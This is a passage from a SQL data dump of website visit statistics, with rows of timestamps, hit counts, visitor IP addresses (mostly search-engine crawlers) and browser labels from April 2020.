,1,0,0,'91.209.11.236','other'),(496114,1586447482,1,1,0,0,'213.180.203.16','other'),(496115,1586448105,1,1,0,0,'178.154.200.222','other'),(496116,1586448725,2,2,0,0,'66.249.70.36','chrome'),(496117,1586448782,1,1,0,0,'66.249.70.38','chrome'),(496118,1586449097,1,1,0,0,'207.46.13.11','other'),(496119,1586449407,1,1,0,0,'178.154.200.222','other'),(496120,1586449491,7,7,0,0,'200.144.254.216','firefox'),(496121,1586450374,2,2,0,0,'63.33.214.122','chrome'),(496122,1586450681,1,1,0,0,'66.249.64.23','chrome'),(496123,1586451642,1,1,0,0,'66.249.64.23','chrome'),(496124,1586452319,1,1,0,0,'207.46.13.11','other'),(496125,1586453235,1,1,0,0,'178.154.200.222','other'),(496126,1586453364,1,1,0,0,'207.46.13.11','other'),(496127,1586453639,2,2,0,0,'66.249.64.25','chrome'),(496128,1586454080,1,1,0,0,'193.106.30.99','firefox'),(496129,1586454615,1,0,1,0,'157.55.39.206',''),(496130,1586454848,1,1,0,0,'157.55.39.206','other'),(496131,1586454859,1,1,0,0,'91.196.178.27','chrome'),(496132,1586455156,2,2,0,0,'8.29.198.27','other'),(496133,1586455264,1,1,0,0,'66.249.64.25','chrome'),(496134,1586455304,1,1,0,0,'178.154.200.196','other'),(496135,1586455803,1,1,0,0,'212.1.108.150','chrome'),(496136,1586455905,1,1,0,0,'212.1.108.150','other'),(496137,1586455908,1,1,0,0,'212.1.108.150','msie'),(496138,1586456794,1,1,0,0,'66.249.70.36','chrome'),(496139,1586456853,3,3,0,0,'207.46.13.11','other'),(496140,1586456854,4,4,0,0,'66.249.64.23','chrome'),(496141,1586457860,1,1,0,0,'195.46.35.149','firefox'),(496142,1586458453,1,1,0,0,'91.196.178.27','chrome'),(496143,1586458626,1,1,0,0,'207.46.13.11','other'),(496144,1586459154,8,8,0,0,'77.120.98.235','other'),(496145,1586459821,1,1,0,0,'128.199.128.126','chrome'),(496146,1586460415,1,1,0,0,'213.180.203.16','other'),(496147,1586462028,1,1,0,0,'207.46.13.11','other'),(496148,1586462118,1,1,0,0,'178.154.200.222','other'),(496149,1586462891,1,1,0,0,'46.211.8.135','chrome'),(496150,1586463235,1,1,0,0,'178.154.200.222','other'),(496151,1586463559,1,1,0,0,'207.46.13.11','other'),(496152,1586464118,2,2,0,0,'157.55.39.206','other'),(496153,1586465791,1,1,0,0,'66.249.70.36','chrome'),(496154,1586465844,1,1,0,0,'66.249.64.23','chrome'),(496155,1586465989,1,1,0,0,'8.29.198.27','other'),(496156,1586466575,1,1,0,0,'8.29.198.26','other'),(496157,1586466760,1,1,0,0,'157.55.39.206','other'),(496158,1586467188,1,1,0,0,'178.154.200.175','other'),(496159,1586467300,1,1,0,0,'66.249.70.38','chrome'),(496160,1586468069,2,2,0,0,'173.252.111.2','other'),(496161,1586468403,2,2,0,0,'207.46.13.11','other'),(496162,1586468954,1,1,0,0,'178.154.200.220','chrome'),(496163,1586469122,1,1,0,0,'66.249.64.24','chrome'),(496164,1586469479,1,1,0,0,'178.154.200.155','other'),(496165,1586469804,1,1,0,0,'207.46.13.11','other'),(496166,1586470478,1,1,0,0,'66.249.64.24','chrome'),(496167,1586470976,1,1,0,0,'178.154.200.216','other'),(496168,1586471052,1,1,0,0,'178.154.200.222','other'),(496169,1586471411,2,2,0,0,'207.46.13.11','other'),(496170,1586471735,1,0,1,0,'157.55.39.206',''),(496171,1586472622,1,1,0,0,'213.180.203.16','other'),(496172,1586472637,1,1,0,0,'195.46.35.149','other'),(496173,1586472654,1,1,0,0,'66.249.64.25','chrome'),(496174,1586473130,2,2,0,0,'157.55.39.206','other'),(496175,1586473230,2,2,0,0,'207.46.13.11','other'),(496176,1586474338,1,1,0,0,'66.249.64.24','chrome'),(496177,1586474352,1,1,0,0,'178.154.200.222','other'),(496178,1586474406,1,1,0,0,'66.249.64.25','chrome'),(496179,1586475377,2,2,0,0,'207.46.13.11','other'),(496180,1586476341,8,8,0,0,'77.120.98.235','other'),(496181,1586476352,2,0,2,0,'207.46.13.11',''),(496182,1586476510,1,1,0,0,'62.205.134.182','other'),(496183,1586476817,1,1,0,0,'8.29.198.25','other'),(496184,1586476943,1,1,0,0,'207.46.13.11','other'),(496185,1586477404,1,1,0,0,'8.29.198.26','other'),(496186,1586477439,1,1,0,0,'213.180.203.122','other'),(496187,1586477642,1,1,0,0,'66.249.64.24','chrome'),(496188,1586478169,1,1,0,0,'178.154.200.220','other'),(496189,1586478372,1,1,0,0,'213.180.203.16','other'),(496190,1586479475,1,1,0,0,'66.249.70.36','chrome'),(496191,1586479610,1,1,0,0,'66.249.64.23','chrome'),(496192,1586480724,1,1,0,0,'66.249.70.36','chrome'),(496193,1586481016,1,1,0,0,'213.180.203.16','other'),(496194,1586482206,1,1,0,0,'66.249.64.24','chrome'),(496195,1586482411,2,2,0,0,'207.46.13.11','other'),(496196,1586482623,1,1,0,0,'157.55.39.206','other'),(496197,1586483930,1,1,0,0,'66.249.64.25','chrome'),(496198,1586484456,1,1,0,0,'207.46.13.11','other'),(496199,1586484622,1,1,0,0,'178.154.200.236','other'),(496200,1586485632,1,1,0,0,'207.46.13.11','other'),(496201,1586486268,2,2,0,0,'157.55.39.206','other'),(496202,1586486279,1,1,0,0,'66.249.64.25','chrome'),(496203,1586486555,1,1,0,0,'40.124.12.92','other'),(496204,1586487644,1,1,0,0,'8.29.198.26','other'),(496205,1586488225,1,1,0,0,'8.29.198.27','other'),(496206,1586488809,1,0,1,0,'66.249.64.23',''),(496207,1586489728,1,1,0,0,'213.180.203.16','other'),(496208,1586489875,1,1,0,0,'157.55.39.206','other'),(496209,1586490829,2,2,0,0,'207.46.13.11','other'),(496210,1586491424,1,1,0,0,'66.249.64.23','chrome'),(496211,1586491748,1,1,0,0,'40.124.12.92','other'),(496212,1586491930,1,1,0,0,'46.211.65.247','chrome'),(496213,1586492659,1,1,0,0,'157.55.39.206','other'),(496214,1586492929,2,2,0,0,'207.46.13.11','other'),(496215,1586492968,8,8,0,0,'77.120.98.235','other'),(496216,1586493654,1,1,0,0,'62.205.134.182','other'),(496217,1586493739,1,0,1,0,'157.55.39.206',''),(496218,1586494945,1,1,0,0,'66.249.64.24','chrome'),(496219,1586495693,1,1,0,0,'178.154.200.222','other'),(496220,1586496168,1,1,0,0,'66.249.64.25','chrome'),(496221,1586496321,1,1,0,0,'66.249.64.24','chrome'),(496222,1586496587,1,1,0,0,'66.249.64.23','chrome'),(496223,1586496684,1,1,0,0,'207.46.13.11','other'),(496224,1586496961,1,1,0,0,'178.251.106.242','other'),(496225,1586498001,1,1,0,0,'157.55.39.206','other'),(496226,1586498470,2,2,0,0,'8.29.198.26','other'),(496227,1586498913,1,1,0,0,'91.196.178.68','chrome'),(496228,1586499948,1,1,0,0,'91.196.177.15','chrome'),(496229,1586501205,2,2,0,0,'207.46.13.11','other'),(496230,1586501372,1,1,0,0,'66.249.64.25','chrome'),(496231,1586502337,2,2,0,0,'212.1.108.150','chrome'),(496232,1586502879,1,1,0,0,'91.196.177.46','chrome'),(496233,1586503077,1,1,0,0,'91.196.178.89','firefox'),(496234,1586503799,1,0,1,0,'207.46.13.11',''),(496235,1586504186,2,2,0,0,'157.55.39.206','other'),(496236,1586504206,1,1,0,0,'178.154.200.119','other'),(496237,1586504215,1,1,0,0,'31.13.127.18','other'),(496238,1586504216,1,1,0,0,'31.13.127.7','other'),(496240,1586504703,1,1,0,0,'193.106.30.99','firefox'),(496241,1586505067,1,1,0,0,'85.115.62.180','other'),(496242,1586505845,1,1,0,0,'207.46.13.11','other'),(496243,1586506551,1,1,0,0,'195.225.146.187','chrome'),(496244,1586506719,1,1,0,0,'91.196.178.181','chrome'),(496245,1586506763,1,1,0,0,'207.46.13.11','other'),(496246,1586506810,1,1,0,0,'31.13.127.22','other'),(496247,1586506811,2,2,0,0,'31.13.127.14','other'),(496249,1586506856,2,2,0,0,'31.13.127.7','other'),(496250,1586506857,1,1,0,0,'31.13.127.11','other'),(496253,1586506884,1,1,0,0,'31.13.127.16','other'),(496255,1586506885,1,1,0,0,'31.13.127.1','other'),(496256,1586506934,1,1,0,0,'178.154.200.216','other'),(496257,1586507067,1,1,0,0,'157.55.39.206','other'),(496258,1586507939,1,1,0,0,'178.154.200.97','other'),(496259,1586509298,1,1,0,0,'8.29.198.26','other'),(496260,1586509883,1,1,0,0,'8.29.198.25','other'),(496261,1586510110,8,8,0,0,'77.120.98.235','other'),(496262,1586510504,1,1,0,0,'207.46.13.11','other'),(496263,1586510505,1,1,0,0,'213.180.203.16','other'),(496264,1586511036,1,1,0,0,'3.19.185.155','chrome'),(496265,1586511386,1,1,0,0,'31.13.127.22','other'),(496266,1586512446,1,1,0,0,'91.196.178.37','chrome'),(496267,1586512720,2,2,0,0,'207.46.13.44','other'),(496268,1586512728,1,1,0,0,'178.154.200.236','other'),(496269,1586513214,1,1,0,0,'213.180.203.16','other'),(496270,1586513556,1,1,0,0,'91.196.178.169','chrome'),(496271,1586513803,1,1,0,0,'178.154.200.19','other'),(496272,1586513812,1,1,0,0,'66.249.64.23','chrome'),(496273,1586514087,1,0,1,0,'157.55.39.206',''),(496274,1586515395,1,1,0,0,'207.46.13.44','other'),(496275,1586515540,1,1,0,0,'66.249.64.24','chrome'),(496276,1586515726,1,1,0,0,'207.46.13.11','other'),(496277,1586515925,1,1,0,0,'66.249.64.25','chrome'),(496278,1586516366,14,14,0,0,'35.183.95.48','msie'),(496279,1586516369,14,14,0,0,'35.183.95.48','chrome'),(496280,1586516385,9,9,0,0,'35.183.95.48','other'),(496281,1586517200,1,1,0,0,'91.196.177.46','chrome'),(496282,1586518033,1,1,0,0,'207.46.13.44','other'),(496283,1586518412,1,1,0,0,'91.196.178.169','chrome'),(496284,1586518510,2,2,0,0,'207.46.13.11','other'),(496285,1586518590,1,1,0,0,'46.211.246.114','chrome'),(496286,1586518841,1,1,0,0,'31.13.127.17','other'),(496287,1586518985,1,1,0,0,'91.196.178.92','chrome'),(496288,1586519134,1,1,0,0,'109.74.154.72','chrome'),(496289,1586519557,1,1,0,0,'207.46.13.11','other'),(496290,1586520124,1,1,0,0,'8.29.198.25','other'),(496291,1586520711,1,1,0,0,'8.29.198.26','other'),(496292,1586520855,1,1,0,0,'207.46.13.44','other'),(496293,1586520896,1,1,0,0,'93.73.199.52','chrome'),(496294,1586522002,1,1,0,0,'131.220.6.152','chrome'),(496295,1586522034,1,1,0,0,'91.196.178.76','chrome'),(496296,1586523035,2,2,0,0,'207.46.13.44','other'),(496297,1586524884,1,0,1,0,'207.46.13.44',''),(496298,1586526240,1,1,0,0,'212.1.108.150','other'),(496299,1586526241,1,1,0,0,'212.1.108.150','msie'),(496300,1586526243,1,1,0,0,'212.1.108.150','chrome'),(496301,1586527070,8,8,0,0,'77.120.98.235','other'),(496302,1586527167,2,2,0,0,'157.55.39.83','other'),(496303,1586527630,1,1,0,0,'207.46.13.44','other'),(496304,1586528422,1,1,0,0,'207.46.13.11','other'),(496305,1586528918,1,1,0,0,'91.196.178.155','chrome'),(496306,1586529220,1,1,0,0,'157.55.39.83','other'),(496307,1586529396,2,2,0,0,'157.55.39.206','other'),(496308,1586529889,1,0,1,0,'66.249.64.25',''),(496309,1586529953,1,1,0,0,'178.154.200.222','other'),(496310,1586530274,1,1,0,0,'66.249.64.24','chrome'),(496311,1586530853,1,1,0,0,'157.55.39.206','other'),(496312,1586530955,1,1,0,0,'8.29.198.27','other'),(496313,1586531542,1,1,0,0,'8.29.198.26','other'),(496314,1586531773,2,2,0,0,'157.55.39.83','other'),(496315,1586531777,1,1,0,0,'207.46.13.11','other'),(496316,1586532923,1,1,0,0,'178.92.171.52','chrome'),(496317,1586533621,1,1,0,0,'207.46.13.44','other'),(496318,1586535558,1,1,0,0,'157.55.39.83','other'),(496319,1586535715,2,2,0,0,'207.46.13.11','other'),(496320,1586536559,1,1,0,0,'66.249.64.24','chrome'),(496321,1586536696,1,1,0,0,'157.55.39.83','other'),(496322,1586536996,1,1,0,0,'212.1.108.150','chrome'),(496323,1586537092,1,1,0,0,'66.249.64.25','chrome'),(496324,1586538014,1,1,0,0,'66.249.64.23','chrome'),(496325,1586538128,1,1,0,0,'157.55.39.83','other'),(496326,1586538357,1,1,0,0,'207.46.13.11','other'),(496327,1586540119,1,1,0,0,'209.17.96.42','other'),(496328,1586540156,1,1,0,0,'66.249.64.23','chrome'),(496329,1586540206,1,1,0,0,'66.249.64.24','chrome'),(496330,1586540266,1,1,0,0,'77.74.177.114','chrome'),(496331,1586540977,2,2,0,0,'207.46.13.44','other'),(496332,1586541655,1,1,0,0,'66.249.64.23','chrome'),(496333,1586541780,2,2,0,0,'8.29.198.25','other'),(496334,1586541933,1,1,0,0,'176.124.133.59','chrome'),(496335,1586542904,1,1,0,0,'207.46.13.44','other'),(496336,1586543020,1,1,0,0,'66.249.64.25','chrome'),(496337,1586543263,1,1,0,0,'91.196.178.144','chrome'),(496338,1586543329,2,2,0,0,'157.55.39.83','other'),(496339,1586543348,8,8,0,0,'77.120.98.235','other'),(496340,1586543370,1,1,0,0,'66.249.64.23','chrome'),(496341,1586543557,1,1,0,0,'207.46.13.11','other'),(496342,1586544240,1,1,0,0,'66.249.70.38','chrome'),(496343,1586544593,2,1,1,0,'157.55.39.206',''),(496344,1586544769,1,1,0,0,'66.249.64.23','chrome'),(496345,1586545030,1,1,0,0,'207.46.13.44','other'),(496346,1586545150,1,1,0,0,'157.55.39.206','other'),(496347,1586545226,1,1,0,0,'207.46.13.11','other'),(496348,1586545522,1,1,0,0,'157.55.39.83','other'),(496349,1586546086,1,1,0,0,'207.46.13.44','other'),(496350,1586546374,1,1,0,0,'207.46.13.11','other'),(496351,1586546634,1,1,0,0,'66.249.70.33','chrome'),(496352,1586547403,1,1,0,0,'157.55.39.206','other'),(496353,1586548030,1,1,0,0,'157.55.39.83','other'),(496354,1586548115,2,1,1,0,'207.46.13.44',''),(496355,1586548314,1,0,1,0,'157.55.39.206',''),(496356,1586548410,2,2,0,0,'158.69.245.202','other'),(496357,1586549681,1,1,0,0,'157.55.39.206','other'),(496358,1586550361,1,1,0,0,'157.55.39.83','other'),(496359,1586550504,1,1,0,0,'207.46.13.44','other'),(496360,1586550741,1,1,0,0,'157.55.39.206','other'),(496361,1586551525,1,1,0,0,'142.93.34.221','other'),(496362,1586552613,1,1,0,0,'8.29.198.26','other'),(496363,1586553198,1,1,0,0,'8.29.198.25','other'),(496364,1586553264,2,2,0,0,'207.46.13.44','other'),(496365,1586555102,1,1,0,0,'157.55.39.83','other'),(496366,1586555312,1,1,0,0,'157.55.39.206','other'),(496367,1586556514,1,1,0,0,'207.46.13.11','other'),(496368,1586557688,1,0,1,0,'157.55.39.206',''),(496369,1586558248,1,1,0,0,'157.55.39.83','other'),(496370,1586558538,1,1,0,0,'207.46.13.11','other'),(496371,1586559276,1,1,0,0,'157.55.39.83','other'),(496372,1586560467,8,8,0,0,'77.120.98.235','other'),(496373,1586560472,1,1,0,0,'173.252.111.19','other'),(496375,1586560586,2,1,1,0,'157.55.39.206',''),(496376,1586561077,1,1,0,0,'207.46.13.11','other'),(496377,1586562086,1,1,0,0,'157.55.39.83','other'),(496378,1586562907,1,1,0,0,'62.205.134.182','other'),(496379,1586563417,1,1,0,0,'207.46.13.11','other'),(496380,1586563442,2,2,0,0,'8.29.198.25','other'),(496381,1586563730,2,2,0,0,'62.210.177.44','chrome'),(496382,1586563732,2,2,0,0,'195.154.242.189','chrome'),(496383,1586563733,2,2,0,0,'62.210.180.146','chrome'),(496384,1586563742,2,2,0,0,'62.210.139.12','chrome'),(496385,1586563749,2,2,0,0,'62.210.180.164','chrome'),(496386,1586563779,1,1,0,0,'157.55.39.206','other'),(496387,1586563991,1,1,0,0,'66.249.64.25','chrome'),(496388,1586564444,1,1,0,0,'207.46.13.11','other'),(496389,1586565354,1,1,0,0,'209.17.96.154','other'),(496390,1586566303,1,1,0,0,'157.55.39.83','other'),(496391,1586566411,1,1,0,0,'157.55.39.206','other'),(496392,1586567625,2,2,0,0,'207.46.13.11','other'),(496393,1586568052,1,1,0,0,'66.249.64.24','chrome'),(496394,1586569051,1,0,1,0,'66.249.64.23',''),(496395,1586569876,1,1,0,0,'157.55.39.83','other'),(496396,1586571082,1,0,1,0,'66.249.64.25',''),(496397,1586571446,1,1,0,0,'157.55.39.83','other'),(496398,1586572440,1,1,0,0,'157.55.39.206','other'),(496399,1586574269,2,2,0,0,'8.29.198.25','other'),(496400,1586574821,1,1,0,0,'65.132.59.34','other'),(496401,1586575395,1,1,0,0,'66.249.70.38','chrome'),(496402,1586576174,1,1,0,0,'5.248.224.61','chrome'),(496403,1586576888,8,8,0,0,'77.120.98.235','other'),(496404,1586579343,1,1,0,0,'5.248.224.61','chrome'),(496405,1586580076,1,0,1,0,'157.55.39.206',''),(496406,1586580386,1,1,0,0,'62.205.134.182','other'),(496407,1586580431,1,1,0,0,'66.249.64.25','chrome'),(496408,1586581164,2,2,0,0,'94.130.9.183','other'),(496409,1586581783,1,1,0,0,'17.58.101.25','other'),(496410,1586583336,1,1,0,0,'178.45.58.10','chrome'),(496411,1586583800,1,1,0,0,'91.196.178.164','chrome'),(496412,1586583827,1,1,0,0,'213.180.203.16','other'),(496413,1586584560,1,1,0,0,'66.249.64.23','chrome'),(496414,1586585054,1,1,0,0,'213.180.203.16','other'),(496415,1586585097,1,1,0,0,'8.29.198.27','other'),(496416,1586585685,1,1,0,0,'8.29.198.26','other'),(496417,1586585771,1,0,1,0,'157.55.39.168',''),(496418,1586585905,1,1,0,0,'157.55.39.206','other'),(496419,1586586013,1,1,0,0,'193.106.30.99','chrome'),(496420,1586586317,2,2,0,0,'178.154.200.222','other'),(496421,1586586390,1,1,0,0,'157.55.39.83','other'),(496422,1586587440,1,1,0,0,'5.180.184.220','firefox'),(496423,1586587458,1,1,0,0,'66.249.64.25','chrome'),(496424,1586587574,1,1,0,0,'66.249.64.24','chrome'),(496425,1586587741,2,2,0,0,'178.154.200.222','other'),(496426,1586588324,1,1,0,0,'91.196.178.137','firefox'),(496427,1586588560,1,1,0,0,'31.13.127.7','other'),(496428,1586588561,1,1,0,0,'31.13.127.19','other'),(496430,1586588802,1,1,0,0,'178.154.200.222','other'),(496431,1586589423,1,1,0,0,'66.249.64.23','chrome'),(496432,1586589721,1,1,0,0,'157.55.39.206','other'),(496433,1586589751,1,1,0,0,'157.55.39.168','other'),(496434,1586589779,1,1,0,0,'31.13.127.22','other'),(496435,1586589846,1,1,0,0,'157.55.39.83','other'),(496436,1586590524,1,1,0,0,'94.153.5.48','chrome'),(496437,1586590939,1,1,0,0,'66.249.64.23','chrome'),(496438,1586591098,1,1,0,0,'213.180.203.17','other'),(496439,1586591667,1,1,0,0,'213.180.203.16','other'),(496440,1586592013,8,8,0,0,'77.120.98.235','other'),(496441,1586592081,1,1,0,0,'157.55.39.159','other'),(496442,1586592943,1,1,0,0,'178.154.200.222','other'),(496443,1586593379,1,1,0,0,'213.180.203.17','other'),(496444,1586593384,1,1,0,0,'213.180.203.122','other'),(496445,1586593808,1,1,0,0,'66.249.70.38','chrome'),(496446,1586595218,1,1,0,0,'91.196.178.156','chrome'),(496447,1586595367,1,1,0,0,'213.180.203.140','other'),(496448,1586595601,1,1,0,0,'178.154.200.222','other'),(496449,1586595625,1,1,0,0,'195.46.35.149','firefox'),(496450,1586595920,2,2,0,0,'8.29.198.26','other'),(496451,1586596655,1,1,0,0,'31.13.127.24','other'),(496452,1586596656,1,1,0,0,'31.13.127.7','other'),(496453,1586597343,1,1,0,0,'178.154.200.222','other'),(496454,1586598041,1,1,0,0,'157.55.39.206','other'),(496455,1586598052,1,1,0,0,'159.224.255.154','chrome'),(496456,1586598127,1,1,0,0,'157.55.39.159','other'),(496457,1586598966,1,1,0,0,'66.249.70.33','chrome'),(496458,1586599428,1,1,0,0,'157.55.39.168','other'),(496459,1586599795,2,2,0,0,'157.55.39.159','other'),(496460,1586599825,2,2,0,0,'94.153.65.114','chrome'),(496461,1586600102,2,2,0,0,'178.154.200.222','other'),(496462,1586600414,2,2,0,0,'66.249.64.25','chrome'),(496463,1586601120,1,0,1,0,'157.55.39.168',''),(496464,1586601431,1,1,0,0,'66.249.64.24','chrome'),(496465,1586602234,2,2,0,0,'178.154.200.222','other'),(496466,1586602844,1,1,0,0,'213.180.203.16','other'),(496467,1586603132,2,2,0,0,'157.55.39.159','other'),(496468,1586603856,1,1,0,0,'91.196.178.164','chrome'),(496469,1586603929,2,2,0,0,'66.249.64.25','chrome'),(496470,1586604570,1,1,0,0,'173.252.111.16','other'),(496471,1586604827,1,1,0,0,'157.55.39.206','other'),(496472,1586605596,1,1,0,0,'173.252.111.24','other'),(496473,1586606013,1,1,0,0,'109.74.154.72','chrome'),(496474,1586606110,2,2,0,0,'40.124.12.92','other'),(496475,1586606670,1,1,0,0,'178.154.200.87','other'),(496476,1586606743,1,1,0,0,'8.29.198.26','other'),(496477,1586606766,1,1,0,0,'13.66.139.0','other'),(496478,1586607004,1,1,0,0,'157.55.39.159','other'),(496479,1586607098,1,1,0,0,'213.180.203.142','other'),(496480,1586607336,1,1,0,0,'173.252.111.10','other'),(496481,1586607344,1,1,0,0,'8.29.198.25','other'),(496482,1586607783,1,1,0,0,'178.154.200.222','other'),(496483,1586607881,1,1,0,0,'157.55.39.168','other'),(496484,1586608023,1,1,0,0,'157.55.39.206','other'),(496485,1586608334,1,1,0,0,'66.249.64.24','chrome'),(496486,1586608473,1,1,0,0,'131.220.6.152','chrome'),(496487,1586608777,3,2,1,0,'157.55.39.159',''),(496488,1586608779,8,8,0,0,'77.120.98.235','other'),(496489,1586608990,2,2,0,0,'178.154.200.222','other'),(496490,1586609169,2,2,0,0,'95.217.133.183','other'),(496491,1586609375,2,2,0,0,'157.55.39.168','other'),(496492,1586609449,1,1,0,0,'66.249.64.25','chrome'),(496493,1586610296,1,1,0,0,'213.180.203.16','other'),(496494,1586610565,1,1,0,0,'91.196.178.183','chrome'),(496495,1586610899,1,1,0,0,'66.249.70.33','chrome'),(496496,1586611112,1,1,0,0,'178.154.200.222','other'),(496497,1586611474,1,1,0,0,'66.249.64.24','chrome'),(496498,1586611490,1,1,0,0,'92.113.191.19','chrome'),(496499,1586612538,2,2,0,0,'157.55.39.206','other'),(496500,1586612717,3,2,1,0,'157.55.39.159',''),(496501,1586614612,1,1,0,0,'157.55.39.206','other'),(496502,1586614624,1,1,0,0,'173.252.111.6','other'),(496503,1586614754,1,1,0,0,'157.55.39.159','other'),(496504,1586615709,5,5,0,0,'188.143.235.92','chrome'),(496505,1586615757,1,1,0,0,'157.55.39.159','other'),(496506,1586616018,1,1,0,0,'157.55.39.206','other'),(496507,1586616694,1,1,0,0,'66.249.64.25','chrome'),(496508,1586617511,2,2,0,0,'157.55.39.168','other'),(496509,1586617546,1,1,0,0,'66.249.64.23','chrome'),(496510,1586617572,2,2,0,0,'8.29.198.26','other'),(496511,1586618740,1,1,0,0,'178.154.200.222','other'),(496512,1586618872,1,1,0,0,'157.55.39.159','other'),(496513,1586619391,1,1,0,0,'176.36.88.53','chrome'),(496514,1586619534,1,1,0,0,'213.180.203.16','other'),(496515,1586619876,1,1,0,0,'178.154.200.97','other'),(496516,1586619942,1,1,0,0,'66.249.64.24','chrome'),(496517,1586620675,2,2,0,0,'157.55.39.159','other'),(496518,1586620868,2,2,0,0,'213.180.203.16','other'),(496519,1586621324,3,3,0,0,'178.154.200.222','other'),(496520,1586622393,8,8,0,0,'77.120.98.235','other'),(496521,1586622466,1,1,0,0,'91.196.178.182','chrome'),(496522,1586622706,1,1,0,0,'198.16.70.51','chrome'),(496523,1586622784,1,1,0,0,'178.154.200.222','other'),(496524,1586622829,1,1,0,0,'157.55.39.206','other'),(496525,1586623476,1,1,0,0,'178.154.200.220','other'),(496526,1586623664,1,1,0,0,'213.180.203.16','other'),(496527,1586623949,1,1,0,0,'157.55.39.168','other'),(496528,1586624159,1,1,0,0,'157.55.39.159','other'),(496529,1586624605,2,2,0,0,'178.154.200.222','other'),(496530,1586625229,48,48,0,0,'148.251.10.183','other'),(496531,1586625286,1,1,0,0,'213.180.203.109','other'),(496532,1586625369,1,1,0,0,'91.196.178.20','chrome'),(496533,1586625979,1,1,0,0,'46.211.8.223','chrome'),(496534,1586626402,1,0,1,0,'157.55.39.168',''),(496535,1586627554,2,2,0,0,'178.154.200.222','other'),(496536,1586627683,1,1,0,0,'46.211.18.52','chrome'),(496537,1586628394,1,1,0,0,'8.29.198.25','other'),(496538,1586628406,3,3,0,0,'213.180.203.16','other'),(496539,1586628996,1,1,0,0,'8.29.198.26','other'),(496540,1586629198,1,1,0,0,'178.95.156.117','chrome'),(496541,1586629395,1,1,0,0,'66.249.64.25','chrome'),(496542,1586629399,1,1,0,0,'178.154.200.222','other'),(496543,1586629456,1,1,0,0,'91.196.178.107','other'),(496544,1586631013,1,1,0,0,'18.191.207.220','chrome'),(496545,1586631539,1,0,1,0,'157.55.39.159',''),(496546,1586631849,1,1,0,0,'178.154.200.222','other'),(496547,1586632064,1,1,0,0,'157.55.39.206','other'),(496548,1586632195,1,1,0,0,'178.154.200.97','other'),(496549,1586632469,1,1,0,0,'213.180.203.17','other'),(496550,1586632560,1,1,0,0,'157.55.39.159','other'),(496551,1586632698,2,2,0,0,'213.180.203.16','other'),(496552,1586633365,1,1,0,0,'66.249.64.24','chrome'),(496553,1586633631,1,1,0,0,'66.249.64.23','chrome'),(496554,1586633739,2,2,0,0,'213.180.203.16','other'),(496555,1586633798,1,1,0,0,'66.249.70.36','chrome'),(496556,1586633866,1,0,1,0,'157.55.39.206',''),(496557,1586633942,1,1,0,0,'157.55.39.159','other'),(496558,1586634524,1,1,0,0,'157.55.39.206','other'),(496559,1586634715,1,1,0,0,'157.55.39.168','other'),(496560,1586635092,1,1,0,0,'176.36.88.53','chrome'),(496561,1586635228,1,1,0,0,'178.154.200.222','other'),(496562,1586635230,1,1,0,0,'91.196.178.69','chrome'),(496563,1586635451,2,2,0,0,'95.91.15.108','other'),(496564,1586636124,1,1,0,0,'157.55.39.159','other'),(496565,1586636180,1,1,0,0,'178.154.200.175','other'),(496566,1586636981,1,1,0,0,'207.46.13.75','other'),(496567,1586637250,1,1,0,0,'178.154.200.222','other'),(496568,1586637456,1,1,0,0,'178.154.200.220','other'),(496569,1586637549,1,0,1,0,'157.55.39.206',''),(496570,1586637955,1,0,1,0,'157.55.39.159',''),(496571,1586638144,1,1,0,0,'178.154.200.236','other'),(496572,1586638422,8,8,0,0,'77.120.98.235','other'),(496573,1586638844,1,1,0,0,'178.154.200.222','other'),(496574,1586639222,2,2,0,0,'8.29.198.26','other'),(496575,1586639570,1,1,0,0,'157.55.39.159','other'),(496576,1586639937,3,3,0,0,'178.154.200.222','other'),(496577,1586641606,1,1,0,0,'178.154.200.222','other'),(496578,1586641754,1,1,0,0,'213.180.203.16','other'),(496579,1586642616,1,0,1,0,'207.46.13.75',''),(496580,1586643818,1,1,0,0,'213.180.203.16','other'),(496581,1586644016,1,1,0,0,'207.46.13.75','other'),(496582,1586644050,2,2,0,0,'178.154.200.222','other'),(496583,1586644938,1,1,0,0,'213.180.203.16','other'),(496584,1586645024,1,1,0,0,'157.55.39.206','other'),(496585,1586645090,1,1,0,0,'92.38.136.69','chrome'),(496586,1586645206,1,0,1,0,'207.46.13.75',''),(496587,1586645419,2,2,0,0,'178.154.200.222','other'),(496588,1586645965,1,1,0,0,'157.55.39.159','other'),(496589,1586646864,1,1,0,0,'178.154.200.222','other'),(496590,1586647282,2,2,0,0,'157.55.39.206','other'),(496591,1586647626,1,1,0,0,'54.161.229.65','chrome'),(496592,1586648811,1,1,0,0,'66.249.64.24','chrome'),(496593,1586649004,2,2,0,0,'178.154.200.222','other'),(496594,1586649175,1,1,0,0,'31.13.103.11','other'),(496595,1586649176,1,1,0,0,'31.13.103.1','other'),(496596,1586649274,1,1,0,0,'213.180.203.16','other'),(496597,1586649306,1,1,0,0,'62.205.134.182','other'),(496598,1586650047,1,1,0,0,'8.29.198.27','other'),(496599,1586650129,1,1,0,0,'178.154.200.196','other'),(496600,1586650160,1,1,0,0,'157.55.39.206','other'),(496601,1586650168,1,1,0,0,'66.249.64.23','chrome'),(496602,1586650220,1,1,0,0,'213.180.203.16','other'),(496603,1586650635,6,6,0,0,'178.154.200.222','other'),(496604,1586650636,1,1,0,0,'8.29.198.26','other'),(496605,1586651360,1,1,0,0,'157.55.39.168','other'),(496606,1586651643,2,2,0,0,'178.154.200.222','other'),(496607,1586653062,1,1,0,0,'176.36.88.53','chrome'),(496608,1586653065,1,1,0,0,'157.55.39.159','other'),(496609,1586653766,1,1,0,0,'66.249.64.24','chrome'),(496610,1586654114,1,1,0,0,'157.55.39.12','other'),(496611,1586654377,1,1,0,0,'157.55.39.206','other'),(496612,1586654422,3,3,0,0,'178.154.200.222','other'),(496613,1586654441,1,1,0,0,'213.180.203.16','other'),(496614,1586655015,1,1,0,0,'66.249.64.24','chrome'),(496615,1586655281,1,1,0,0,'213.180.203.17','other'),(496616,1586655288,1,1,0,0,'157.55.39.159','other'),(496617,1586655424,8,8,0,0,'77.120.98.235','other'),(496618,1586655468,1,1,0,0,'157.55.39.168','other'),(496619,1586655548,1,1,0,0,'66.249.70.38','chrome'),(496620,1586655556,1,1,0,0,'213.180.203.95','other'),(496621,1586655980,1,1,0,0,'66.249.64.23','chrome'),(496622,1586656331,2,2,0,0,'178.154.200.222','other'),(496623,1586656467,1,0,1,0,'157.55.39.159',''),(496624,1586656658,1,1,0,0,'213.180.203.16','other'),(496625,1586657320,4,4,0,0,'178.154.200.222','other'),(496626,1586657901,2,2,0,0,'213.180.203.16','other'),(496627,1586658684,3,3,0,0,'178.154.200.222','other'),(496628,1586